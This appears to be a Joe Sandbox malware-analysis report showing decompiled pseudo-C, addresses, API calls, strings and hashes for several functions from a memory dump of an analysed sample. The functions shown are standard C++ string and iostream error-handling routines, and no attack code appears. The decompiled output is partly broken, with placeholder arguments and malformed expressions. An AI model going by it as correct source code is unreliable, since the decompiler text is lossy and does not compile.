Opcode ID: 201d061a5b7a209d6568ec3affac7849a46d01743ce0da106a3469f7320f6c36
Instruction ID: 67229aab706ed0802deae0a8a6529cd8425f044924947821164161c6e87055a6
Opcode Fuzzy Hash: 201d061a5b7a209d6568ec3affac7849a46d01743ce0da106a3469f7320f6c36
Instruction Fuzzy Hash: BCF18FB19043698FEF20CF28E8943DDBBF6AF46308F4441EAC449AB645D7759A85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 014406C0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E014406C0(intOrPtr* __ecx, void* __edi, void* __esi, char* _a4, intOrPtr* _a8, signed char** _a12) {
				void* _v16;
				signed char* _v44;
				char* _v48;
				char* _v52;
				char _v68;
				char* _v72;
				char* _v76;
				char* _v92;
				char* _v96;
				char* _v100;
				signed char** _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				void* _v128;
				intOrPtr _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				void* __ebx;
				intOrPtr* _t100;
				intOrPtr* _t102;
				char* _t107;
				char* _t109;
				char* _t114;
				void* _t116;
				char* _t118;
				char** _t120;
				char* _t121;
				char* _t124;
				char* _t125;
				char* _t126;
				char* _t128;
				char* _t132;
				intOrPtr* _t136;
				char* _t137;
				intOrPtr* _t142;
				char* _t144;
				char* _t147;
				char* _t153;
				char* _t154;
				char* _t159;
				signed char* _t160;
				char* _t161;
				signed char** _t164;
				char** _t167;
				void* _t171;
				void* _t173;
				void* _t174;
				char** _t175;
				intOrPtr* _t178;
				char** _t179;

				_t171 = _t173;
				_push(__edi);
				_push(__esi);
				_t136 = __ecx;
				_t174 = _t173 - 0x8c;
				_t100 = _a8;
				_t159 = _a4;
				_t164 = _a12;
				_v124 = _t100;
				_v120 = _t159;
				_t102 =  *((intOrPtr*)( *_t100 + 0x10));
				if(_t102 != E013E84D0) {
					_t142 =  &_v52;
					_v128 = _t142;
					_v152 = _v120;
					_t151 = _v124;
					_v156 = _v124;
					 *_t102();
					_v112 =  &_v44;
					_t175 = _t174 - 8;
				} else {
					_v48 = 0;
					_v128 =  &_v52;
					_t132 =  &_v44;
					_v112 = _t132;
					_v52 = _t132;
					_v44 = 0;
					if(_t159 == 1) {
						_v144 = 0xe;
						_v148 = "iostream error";
						_v152 = 0;
						_v156 = 0;
						_t142 = _v128;
						E01462400(__ecx, _t142, _t159, _t164, _t171);
					} else {
						_v144 = 0xd;
						_v148 = "Unknown error";
						_v152 = 0;
						_v156 = 0;
						_t142 = _v128;
						E01462400(__ecx, _t142, _t159, _t164, _t171);
					}
					_t175 = _t174 - 0x10;
				}
				_t160 =  *_t164;
				_t165 = _t164[1];
				_v76 =  &_v68;
				_v100 = _t165;
				if(_t165 > 0xf) {
					_v160 = 0;
					_t142 =  &_v76;
					 *_t175 =  &_v100;
					_t107 = E01464F10(_t136, _t160, _t171);
					_t151 = _v100;
					_v76 = _t107;
					_t175 = _t175 - 8;
					_v68 = _v100;
					goto L27;
				} else {
					if(_t165 != 1) {
						_t109 =  &_v68;
						if(_t165 != 0) {
							L27:
							_v156 = _t165;
							_v160 = _t160;
							 *_t175 = _t107;
							memcpy(??, ??, ??);
							_t165 = _v100;
							_t109 = _v76;
						}
					} else {
						_v68 =  *_t160 & 0x000000ff;
						_t109 =  &_v68;
					}
				}
				_v72 = _t165;
				 *((char*)(_t109 + _t165)) = 0;
				if(0x3fffffff - _v72 <= 1) {
					 *_t175 = "basic_string::append";
					E014797B0(_t151, _t160);
					goto L38;
				} else {
					_v160 = 2;
					 *_t175 = ": ";
					E01464DB0( &_v76);
					_t151 = _v72;
					_t175 = _t175 - 8;
					_t118 = _v48;
					_t160 = _v76;
					_v116 = _v52;
					_t165 =  &_v68;
					_t144 =  &(_t151[_t118]);
					if(_t160 ==  &_v68) {
						if(_t144 <= 0xf) {
							goto L13;
						} else {
							_t165 = _v112;
							if(_v116 != _v112) {
								goto L11;
							} else {
								goto L13;
							}
						}
					} else {
						if(_v68 >= _t144) {
							L13:
							_t142 = 0x3fffffff - _t151;
							if(_t142 < _t118) {
								L38:
								_v160 = "basic_string::append";
								_t137 = E014797B0(_t151, _t160);
								_t114 = _v52;
								_t152 = _v112;
								if(_t114 != _v112) {
									_v156 = _t114;
									L01477910();
								}
								_v156 = _t137;
								E013D8C90(_t114, _t137, _t152, _t160, _t165);
								0;
								_push(_t137);
								 *_t142 = 0x14b17cc;
								_t116 = E01451D00(_t142);
								 *((intOrPtr*)(_t175 - 0x18)) = _t142;
								L01477910();
								return _t116;
							} else {
								_v160 = _t118;
								 *_t175 = _v116;
								_t120 = E01464DB0( &_v76);
								_t178 = _t175 - 8;
								goto L15;
							}
						} else {
							if(_v116 == _v112) {
								_t165 = 0xf;
							} else {
								L11:
								_t165 = _v44;
							}
							if(_t165 >= _t144) {
								_v152 = _t151;
								_v156 = _t160;
								_v160 = 0;
								 *_t175 = 0;
								_t120 = E01462400(_t136, _v128, _t160, _t165, _t171);
								_t178 = _t175 - 0x10;
								L15:
								_t161 =  &_v92;
								_t44 =  &(_t120[2]); // 0x8
								_t147 = _t44;
								_t167 = _t120;
								_v100 = _t161;
								_t153 =  *_t120;
								_t121 = _t120[1];
								if(_t153 == _t147) {
									_t154 =  &(_t121[1]);
									_t121 = 0xffffffff;
									if(_t154 != 0) {
										_v160 = _t147;
										_v156 = _t154;
										_v116 = _t147;
										 *_t178 = _t161;
										memcpy(??, ??, ??);
										_t121 = _t167[1];
										_t147 = _v116;
									}
								} else {
									_v100 = _t153;
									_v92 = _t167[2];
								}
								_v96 = _t121;
								 *_t167 = _t147;
								_t167[1] = 0;
								_t167[2] = 0;
								 *_t178 =  &_v100;
								E01451B90(_t136);
								_t124 = _v100;
								_t179 = _t178 - 4;
								if(_t124 != _t161) {
									 *_t179 = _t124;
									L01477910();
								}
								_t125 = _v76;
								if(_t125 !=  &_v68) {
									 *_t179 = _t125;
									L01477910();
								}
								_t126 = _v52;
								if(_t126 != _v112) {
									 *_t179 = _t126;
									L01477910();
								}
								 *_t136 = 0x14b17cc;
								 *((intOrPtr*)(_t136 + 8)) = _v120;
								_t128 = _v124;
								 *(_t136 + 0xc) = _t128;
								return _t128;
							} else {
								goto L13;
							}
						}
					}
				}
			}

0x014406c1
0x014406c3
0x014406c4
0x014406c6
0x014406c8
0x014406ce
0x014406d1
0x014406d4
0x014406d7
0x014406dc
0x014406df
0x014406e7
0x01440973
0x01440976
0x01440979
0x0144097d
0x01440980
0x01440983
0x01440988
0x0144098b
0x014406ed
0x014406f0
0x014406f7
0x014406fa
0x014406fd
0x01440700
0x01440703
0x0144070a
0x01440910
0x01440918
0x01440920
0x01440928
0x0144092f
0x01440932
0x01440710
0x01440710
0x01440718
0x01440720
0x01440728
0x0144072f
0x01440732
0x01440732
0x01440737
0x01440737
0x0144073a
0x0144073c
0x01440742
0x01440745
0x0144074b
0x0144089b
0x014408a3
0x014408a6
0x014408a9
0x014408ae
0x014408b1
0x014408b4
0x014408b7
0x00000000
0x01440751
0x01440754
0x01440888
0x0144088d
0x014408ba
0x014408ba
0x014408be
0x014408c2
0x014408c5
0x014408ca
0x014408cd
0x014408cd
0x0144075a
0x0144075d
0x01440760
0x01440760
0x01440754
0x01440763
0x01440766
0x01440775
0x014409c2
0x014409c9
0x00000000
0x0144077b
0x0144077b
0x01440786
0x0144078d
0x01440795
0x01440798
0x0144079b
0x0144079e
0x014407a1
0x014407a4
0x014407a7
0x014407ac
0x0144099b
0x00000000
0x014409a1
0x014409a1
0x014409a7
0x00000000
0x014409ad
0x00000000
0x014409ad
0x014409a7
0x014407b2
0x014407b5
0x014407ce
0x014407d3
0x014407d7
0x014409ce
0x014409ce
0x014409da
0x01440a0d
0x01440a10
0x01440a15
0x01440a17
0x01440a1a
0x01440a1a
0x01440a1f
0x01440a22
0x01440a2d
0x01440a30
0x01440a36
0x01440a3c
0x01440a41
0x01440a44
0x01440a4d
0x014407dd
0x014407dd
0x014407e7
0x014407ea
0x014407ef
0x00000000
0x014407ef
0x014407b7
0x014407bd
0x014409b8
0x014407c3
0x014407c3
0x014407c3
0x014407c3
0x014407c8
0x01440940
0x01440944
0x01440948
0x01440950
0x0144095a
0x0144095f
0x014407f2
0x014407f2
0x014407f5
0x014407f5
0x014407f8
0x014407fa
0x014407fd
0x014407ff
0x01440804
0x014408d8
0x014408db
0x014408e2
0x014408e8
0x014408ec
0x014408f0
0x014408f3
0x014408f6
0x014408fb
0x014408fe
0x014408fe
0x0144080a
0x0144080a
0x01440810
0x01440810
0x01440813
0x01440819
0x0144081d
0x01440824
0x01440828
0x0144082b
0x01440830
0x01440833
0x01440838
0x0144083a
0x0144083d
0x0144083d
0x01440842
0x0144084a
0x0144084c
0x0144084f
0x0144084f
0x01440854
0x0144085c
0x0144085e
0x01440861
0x01440861
0x01440869
0x0144086f
0x01440872
0x01440875
0x0144087f
0x00000000
0x00000000
0x00000000
0x014407c8
0x014407b5
0x014407ac

APIs

Part of subcall function 01462400: memmove.MSVCRT ref: 0146249D
Part of subcall function 01462400: memcpy.MSVCRT ref: 014624C8

memcpy.MSVCRT ref: 014408C5

Part of subcall function 01464DB0: memcpy.MSVCRT ref: 01464DEC

Strings

iostream error, xrefs: 01440918
Unknown error, xrefs: 01440718
basic_string::append, xrefs: 014409C2, 014409CE

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 0fd699870abe3acf57af27b91fbf28cc72d06093a095b5972f2bf2ac412baea6
Instruction ID: 4cd7813d8b90ea29ff4eff42c62e697143fd75b934aee375f41cbf48ee7021c7
Opcode Fuzzy Hash: 0fd699870abe3acf57af27b91fbf28cc72d06093a095b5972f2bf2ac412baea6
Instruction Fuzzy Hash: 9BA125B4D04319CBEB14EFA8C48469EBBF1BF54310F25892EE995AB361D7309855CF82

Uniqueness

Uniqueness Score: -1.00%

Function 014314C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E014314C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, void _a8, void* _a12, int _a16) {
				void* _v16;
				char _v29;
				intOrPtr _v48;
				int _v52;
				char* _v56;
				signed int _v64;
				signed int _v68;
				char* _v72;
				void* _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char* _v104;
				signed int _t75;
				intOrPtr _t77;
				intOrPtr _t82;
				void* _t90;
				int _t95;
				intOrPtr _t98;
				intOrPtr _t105;
				void* _t106;
				void* _t113;
				int _t116;
				void* _t120;
				intOrPtr* _t127;
				intOrPtr _t133;
				char* _t143;
				void* _t148;
				int _t151;
				void* _t154;
				int _t160;
				char* _t161;
				signed int _t162;
				void* _t163;
				int _t166;
				int _t170;
				void* _t176;
				void* _t180;
				intOrPtr* _t181;

				_t154 = __edi;
				_t176 = _t180;
				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t127 = __ecx;
				_t181 = _t180 - 0x3c;
				_t133 =  *__ecx;
				_t166 = _a16;
				_t75 =  *(_t133 - 0xc);
				if(_t75 < _a4) {
					L32:
					_v64 = _t75;
					_v72 = "basic_string::replace";
					_v68 = _a4;
					_v76 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
					_t77 = E01473530(_t154, __eflags);
					_v76 =  &_v29;
					__eflags = _t154 - 0xc;
					_push(E0142FE70(_t154 - 0xc));
					 *_t181 = _t77;
					E013D8C90(_t79, _t77, _t143, _t154, _t166);
					_t82 =  *_v68;
					_v100 = _t82;
					_v96 =  *((intOrPtr*)(_t82 - 0xc));
					_v104 = _v72;
					 *((intOrPtr*)(_t181 - 0x1c)) = _v76;
					return E014314C0(_t77, _t154 - 0xc, _t154, _t166);
				} else {
					_t143 =  >  ? _a8 : _t75 - _a4;
					_t154 = _t143 - _t75 + 0x1ffffffe;
					if(_t154 < _t166) {
						_v76 = "basic_string::replace";
						_t75 = E014797B0(_t143, _t154);
						goto L32;
					} else {
						if(_a12 < _t133 || _t133 + _t75 * 2 < _a12) {
							L15:
							_v68 = _t166;
							_v72 = _t143;
							_v76 = _a4;
							E01431A60(_t127);
							__eflags = _t166;
							if(_t166 == 0) {
								goto L12;
							} else {
								_t90 =  *_t127 + _a4 * 2;
								__eflags = _t166 - 1;
								if(_t166 == 1) {
									 *_t90 =  *_a12 & 0x0000ffff;
									return _t127;
								} else {
									_t170 = _t166 + _t166;
									__eflags = _t170;
									memcpy(_t90, _a12, _t170);
									return _t127;
								}
							}
						} else {
							_t95 =  *0x14a31d0; // 0x2
							if(_t95 != 0) {
								__eflags =  *(_t133 - 4);
								if( *(_t133 - 4) <= 0) {
									_t133 =  *__ecx;
									goto L6;
								} else {
									goto L15;
								}
							} else {
								if( *(_t133 - 4) > 0) {
									goto L15;
								} else {
									L6:
									_t160 = _t166 + _t166;
									_v52 = _t160;
									_t161 = _t160 + _a12;
									_t98 = _a4 + _a4;
									_v48 = _t98;
									if(_t98 + _t133 >= _t161) {
										_t162 = _a12 - _t133 >> 1;
										goto L9;
									} else {
										if(_a12 < _t133 +  &(_t143[_a4]) * 2) {
											_v56 = _t143;
											_v72 = _t161;
											_v64 = 0;
											_v68 =  &_v29;
											_v76 = _a12;
											_t113 = E0142F860(_t127, _t133, _t161, _t166, _t176);
											_v68 = _t166;
											_t163 = _t113;
											_v72 = _v56;
											_v76 = _a4;
											E01431A60(_t127);
											__eflags = _t166;
											if(_t166 != 0) {
												_t120 = _v48 +  *_t127;
												__eflags = _t166 - 1;
												if(_t166 == 1) {
													 *_t120 =  *_t163 & 0x0000ffff;
												} else {
													memcpy(_t120, _t163, _v52);
												}
											}
											_t151 =  *0x14a31d0; // 0x2
											__eflags = _t151;
											if(_t151 != 0) {
												_t116 = 0xffffffff;
												asm("lock xadd [edi-0x4], eax");
											} else {
												_t116 =  *(_t163 - 4);
												 *(_t163 - 4) = _t116 - 1;
											}
											__eflags = _t116;
											if(_t116 <= 0) {
												_v76 = _t163 - 0xc;
												L01477910();
											}
										} else {
											_t162 = (_a12 - _t133 >> 1) + _t166 - _t143;
											L9:
											_v72 = _t143;
											_v68 = _t166;
											_v76 = _a4;
											E01431A60(_t127);
											_t105 =  *_t127;
											_t148 = _t105 + _t162 * 2;
											_t106 = _t105 + _v48;
											if(_t166 == 1) {
												 *_t106 =  *_t148 & 0x0000ffff;
											} else {
												if(_t166 != 0) {
													memcpy(_t106, _t148, _v52);
												}
											}
										}
									}
									L12:
									return _t127;
								}
							}
						}
					}
				}
			}

0x014314c0
0x014314c1
0x014314c3
0x014314c4
0x014314c5
0x014314c6
0x014314c8
0x014314cb
0x014314cd
0x014314d0
0x014314d6
0x01431700
0x01431700
0x01431707
0x0143170f
0x01431713
0x0143171a
0x01431726
0x01431729
0x01431731
0x01431732
0x01431735
0x01431747
0x0143174c
0x01431754
0x01431758
0x01431760
0x0143176e
0x014314dc
0x014314e4
0x014314ec
0x014314f4
0x014316f4
0x014316fb
0x00000000
0x014314fa
0x014314fd
0x014315c0
0x014315c0
0x014315c6
0x014315cd
0x014315d0
0x014315d8
0x014315da
0x00000000
0x014315dc
0x014315e1
0x014315e4
0x014315e7
0x01431616
0x01431622
0x014315e9
0x014315e9
0x014315e9
0x014315f9
0x01431607
0x01431607
0x014315e7
0x0143150f
0x0143150f
0x01431516
0x014315b3
0x014315b5
0x01431628
0x00000000
0x00000000
0x00000000
0x00000000
0x0143151c
0x01431521
0x00000000
0x01431527
0x01431527
0x0143152a
0x0143152d
0x01431530
0x01431533
0x01431535
0x0143153c
0x014316c7
0x00000000
0x01431542
0x0143154d
0x01431633
0x01431636
0x0143163a
0x0143163f
0x01431646
0x01431649
0x0143164e
0x01431657
0x01431659
0x01431660
0x01431663
0x0143166b
0x0143166d
0x01431672
0x01431674
0x01431677
0x014316ef
0x01431679
0x01431687
0x01431687
0x01431677
0x0143168c
0x01431692
0x01431694
0x014316e0
0x014316e5
0x01431696
0x01431696
0x0143169c
0x0143169c
0x0143169f
0x014316a1
0x014316ac
0x014316af
0x014316af
0x01431553
0x01431560
0x01431562
0x01431562
0x01431568
0x0143156f
0x01431572
0x01431577
0x0143157f
0x01431582
0x01431587
0x014316d3
0x0143158d
0x0143158f
0x0143159f
0x0143159f
0x0143158f
0x01431587
0x0143154d
0x014315a4
0x014315ad
0x014315ad
0x01431521
0x01431516
0x014314fd
0x014314f4

APIs

memcpy.MSVCRT ref: 0143159F
memcpy.MSVCRT ref: 014315F9
memcpy.MSVCRT ref: 01431687

Part of subcall function 01431A60: memcpy.MSVCRT ref: 01431AEC

Strings

basic_string::replace, xrefs: 014316F4, 01431707
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 01431713

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: ec160d15c0e2f7463449d015094135c316a935dd7eff4145aac524724d87fa36
Instruction ID: b58c7475848cacefd0f425cc791d87731ce52cadc6e154846ec6732262e0dc02
Opcode Fuzzy Hash: ec160d15c0e2f7463449d015094135c316a935dd7eff4145aac524724d87fa36
Instruction Fuzzy Hash: 11814675A052159FCB00EF68C58059EBBF1FFD8A50F09892EE988C7360E730E951CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0143A560 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0143A560(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, char* _a4, void _a8, void* _a12, int _a16) {
				void* _v16;
				char _v29;
				void* _v48;
				char* _v52;
				char _v64;
				int _v68;
				char* _v72;
				char* _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char* _v104;
				char _t69;
				intOrPtr _t71;
				intOrPtr _t76;
				int _t90;
				intOrPtr _t100;
				void* _t101;
				int _t111;
				intOrPtr* _t122;
				intOrPtr _t128;
				void* _t134;
				char* _t138;
				int _t144;
				int _t147;
				void* _t152;
				void* _t158;
				void* _t162;
				void* _t164;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;

				_t153 = __esi;
				_t167 = _t171;
				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t122 = __ecx;
				_t172 = _t171 - 0x3c;
				_t128 =  *__ecx;
				_t147 = _a16;
				_t69 =  *((intOrPtr*)(_t128 - 0xc));
				if(_t69 < _a4) {
					L32:
					_v64 = _t69;
					_v72 = "basic_string::replace";
					_v68 = _a4;
					_v76 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
					_t71 = E01473530(_t147, __eflags);
					_v76 =  &_v29;
					__eflags = _v48 - 0xc;
					_push(E01438FF0(_v48 - 0xc));
					 *_t172 = _t71;
					E013D8C90(_t73, _t71, _t138, _t147, _t153);
					_t76 =  *_v68;
					_v100 = _t76;
					_v96 =  *((intOrPtr*)(_t76 - 0xc));
					_v104 = _v72;
					 *((intOrPtr*)(_t172 - 0x1c)) = _v76;
					return E0143A560(_t71, _v48 - 0xc, _t147, _t153);
				} else {
					_t138 =  >  ? _a8 : _t69 - _a4;
					_t153 = _t138 - _t69 + 0x3ffffffc;
					if(_t138 - _t69 + 0x3ffffffc < _t147) {
						_v76 = "basic_string::replace";
						_t69 = E014797B0(_t138, _t147);
						goto L32;
					} else {
						if(_a12 < _t128 || _t69 + _t128 < _a12) {
							L15:
							_v68 = _t147;
							_v72 = _t138;
							_v76 = _a4;
							E0143AAF0(_t122);
							__eflags = _t147;
							if(_t147 == 0) {
								goto L12;
							} else {
								_t158 =  &(_a4[ *_t122]);
								__eflags = _t147 - 1;
								if(_t147 == 1) {
									 *_t158 =  *_a12 & 0x000000ff;
									return _t122;
								} else {
									memcpy(_t158, _a12, _t147);
									return _t122;
								}
							}
						} else {
							_t90 =  *0x14a31d0; // 0x2
							if(_t90 != 0) {
								__eflags =  *(_t128 - 4);
								if( *(_t128 - 4) <= 0) {
									_t128 =  *__ecx;
									goto L6;
								} else {
									goto L15;
								}
							} else {
								if( *(_t128 - 4) > 0) {
									goto L15;
								} else {
									L6:
									_t161 = _a12 + _t147;
									if( &(_a4[_t128]) >= _a12 + _t147) {
										_t162 = _a12 - _t128;
										goto L9;
									} else {
										if(_a12 <  &(( &(_a4[_t138]))[_t128])) {
											_v52 = _t138;
											_v64 = 0;
											_v48 = E01438960(_t122, _t128, _t138, _t147, _t161, _t167, _a12, _t161,  &_v29);
											_v68 = _t147;
											_v72 = _v52;
											_v76 = _a4;
											E0143AAF0(_t122);
											__eflags = _t147;
											if(_t147 != 0) {
												_t164 =  &(_a4[ *_t122]);
												__eflags = _t147 - 1;
												if(_t147 == 1) {
													 *_t164 =  *_v48 & 0x000000ff;
												} else {
													memcpy(_t164, _v48, _t147);
												}
											}
											_t144 =  *0x14a31d0; // 0x2
											__eflags = _t144;
											if(_t144 != 0) {
												_t111 = 0xffffffff;
												asm("lock xadd [edi-0x4], eax");
											} else {
												_t152 = _v48;
												_t111 =  *(_t152 - 4);
												 *(_t152 - 4) = _t111 - 1;
											}
											__eflags = _t111;
											if(_t111 <= 0) {
												_v76 = _v48 - 0xc;
												L01477910();
											}
										} else {
											_t162 = _a12 - _t128 + _t147 - _t138;
											L9:
											_v68 = _t147;
											_v72 = _t138;
											_v76 = _a4;
											E0143AAF0(_t122);
											_t100 =  *_t122;
											_t134 = _t162 + _t100;
											_t101 = _t100 + _a4;
											if(_t147 == 1) {
												 *_t101 =  *_t134 & 0x000000ff;
											} else {
												if(_t147 != 0) {
													memcpy(_t101, _t134, _t147);
												}
											}
										}
									}
									L12:
									return _t122;
								}
							}
						}
					}
				}
			}

0x0143a560
0x0143a561
0x0143a563
0x0143a564
0x0143a565
0x0143a566
0x0143a568
0x0143a56b
0x0143a56d
0x0143a570
0x0143a576
0x0143a795
0x0143a795
0x0143a79c
0x0143a7a4
0x0143a7a8
0x0143a7af
0x0143a7bc
0x0143a7bf
0x0143a7c7
0x0143a7c8
0x0143a7cb
0x0143a7d7
0x0143a7dc
0x0143a7e4
0x0143a7e8
0x0143a7f0
0x0143a7fe
0x0143a57c
0x0143a584
0x0143a58c
0x0143a594
0x0143a789
0x0143a790
0x00000000
0x0143a59a
0x0143a59d
0x0143a650
0x0143a650
0x0143a656
0x0143a65d
0x0143a660
0x0143a668
0x0143a66a
0x00000000
0x0143a66c
0x0143a66f
0x0143a671
0x0143a674
0x0143a69e
0x0143a6a9
0x0143a676
0x0143a684
0x0143a692
0x0143a692
0x0143a674
0x0143a5ae
0x0143a5ae
0x0143a5b5
0x0143a64b
0x0143a64d
0x0143a6b0
0x00000000
0x00000000
0x00000000
0x00000000
0x0143a5bb
0x0143a5c0
0x00000000
0x0143a5c6
0x0143a5c6
0x0143a5cb
0x0143a5d4
0x0143a755
0x00000000
0x0143a5da
0x0143a5e4
0x0143a6c3
0x0143a6c6
0x0143a6e0
0x0143a6e3
0x0143a6ea
0x0143a6f1
0x0143a6f4
0x0143a6fc
0x0143a6fe
0x0143a703
0x0143a705
0x0143a708
0x0143a785
0x0143a70a
0x0143a718
0x0143a718
0x0143a708
0x0143a71d
0x0143a723
0x0143a725
0x0143a773
0x0143a778
0x0143a727
0x0143a727
0x0143a72a
0x0143a730
0x0143a730
0x0143a733
0x0143a735
0x0143a741
0x0143a744
0x0143a744
0x0143a5ea
0x0143a5f5
0x0143a5f7
0x0143a5f7
0x0143a5fd
0x0143a604
0x0143a607
0x0143a60c
0x0143a613
0x0143a615
0x0143a61b
0x0143a763
0x0143a621
0x0143a623
0x0143a630
0x0143a630
0x0143a623
0x0143a61b
0x0143a5e4
0x0143a635
0x0143a63e
0x0143a63e
0x0143a5c0
0x0143a5b5
0x0143a59d
0x0143a594

APIs

memcpy.MSVCRT ref: 0143A630
memcpy.MSVCRT ref: 0143A684
memcpy.MSVCRT ref: 0143A718

Part of subcall function 0143AAF0: memcpy.MSVCRT ref: 0143AB80

Strings

basic_string::replace, xrefs: 0143A789, 0143A79C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0143A7A8

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 4502779f798104c6187296b1ab3cc632faf5d344e7f0009a7e419408865391c5
Instruction ID: 6ed45dec72cd57dc5d648117c494f1e11ae7c0b2613292da3ce014724315adee
Opcode Fuzzy Hash: 4502779f798104c6187296b1ab3cc632faf5d344e7f0009a7e419408865391c5
Instruction Fuzzy Hash: 8D812475A482059FCB00EF2DC58459EBBF1BFD8254F258A2EE898D7360E330D9518B92

Uniqueness

Uniqueness Score: -1.00%

Function 01440420 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E01440420(intOrPtr* __ecx, int _a4, char _a8, intOrPtr _a12) {
				void* _v16;
				char _v44;
				char _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				char _v100;
				int _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v128;
				char* _v132;
				void* _v136;
				char _v140;
				char _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t76;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				char* _t100;
				intOrPtr* _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				char _t112;
				intOrPtr _t113;
				int _t118;
				char _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				char _t126;
				intOrPtr* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				intOrPtr* _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;

				_t127 = __ecx;
				_t103 =  &_v52;
				_t130 = _t129 - 0x7c;
				_t126 = _a8;
				_t118 = _a4;
				_v112 = _t118;
				_t76 =  *((intOrPtr*)( *_t126 + 0x10));
				if(_t76 != E013E84D0) {
					_v140 = _t126;
					_v136 = _v112;
					 *_t76();
					_v120 =  &_v44;
					_t131 = _t130 - 8;
				} else {
					_t100 =  &_v44;
					_v48 = 0;
					_v120 = _t100;
					_v52 = _t100;
					_v44 = 0;
					if(_t118 == 1) {
						_v128 = 0xe;
						_v132 = "iostream error";
						_v136 = 0;
						_v140 = 0;
						E01462400( &_v52,  &_v52, _t126, __ecx, _t128);
					} else {
						_v128 = 0xd;
						_v132 = "Unknown error";
						_v136 = 0;
						_v140 = 0;
						E01462400( &_v52,  &_v52, _t126, __ecx, _t128);
					}
					_t131 = _t130 - 0x10;
				}
				_v136 = 2;
				_v140 = ": ";
				_v144 = 0;
				 *_t131 = 0;
				_t104 = E01462400(_t103, _t103, _t126, _t127, _t128);
				_t132 = _t131 - 0x10;
				_v76 =  &_v68;
